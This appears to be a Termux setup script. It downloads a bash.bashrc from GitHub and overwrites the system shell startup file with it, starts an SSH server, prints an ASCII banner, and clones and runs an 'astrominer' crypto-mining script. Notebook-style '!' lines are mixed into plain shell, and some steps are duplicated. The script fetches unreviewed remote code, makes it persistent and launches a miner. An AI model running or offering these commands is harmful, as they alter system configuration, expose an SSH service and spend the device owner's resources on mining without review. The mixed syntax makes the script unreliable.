cd && cd ../usr/etc
wget https://raw.githubusercontent.com/scorpionyb/file-bashrc/main/bash.bashrc1
rm -rf bash.bashrc
cp bash.bashrc1 ../etc/bash.bashrc
rm -rf bash.bashrc1
cd
clear
sshd
termux-wake-lock
for i in $(seq 7)
do
echo -e "\e[1;3"$i"m  \e[1m"
echo "。、★、•、、、";
echo "、、 ☆ ❤ 、＼＊•";
echo "•❤☆＼•＼☆＼、＊";
echo "＼、＊• ❤＼☆＼、";
echo "╭⌒╮⌒⌒╮•╱◥██◣❤ ★";
echo "｜田  ｜田田|•♧";
echo "╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬";
echo "   ";
echo "   ";
echo "   ";
sleep 1
echo "copyright © by AT 0933954440";
sleep 1
echo "loading................";
sleep 1
clear
echo "loading................";
sleep 1
clear
echo "loading................";
sleep 1
clear
done
export PS1="\[\e[32m\][\[\e[m\]\[\e[31m\]\u\[\e[m\]\[\e[33m\]@\[\e[m\]\[\e[32m\]\h\[\e[m\]:\[\e[36m\]\w\[\e[m\]\[\e[32m\]]\[\e[m\]\[\e[32;47m\]\\$\[\e[m\] "
! apt-get install git 

! pkg install git

! cd V1.9.2.R5

! chmod +x rpc_mining.sh

! chmod u+x astrominer

! ./rpc_mining.sh

! cd 

! rm -rf V1.9.2.R5

! git clone https://github.com/scorpionyb/V1.9.2.R5.git

! cd V1.9.2.R5

! chmod +x rpc_mining.sh

! chmod u+x astrominer

! ./rpc_mining.sh

cd && cd ../usr/etc
wget https://raw.githubusercontent.com/scorpionyb/file-bashrc/main/bash.bashrc1
rm -rf bash.bashrc
cp bash.bashrc1 ../etc/bash.bashrc
rm -rf bash.bashrc1
cd
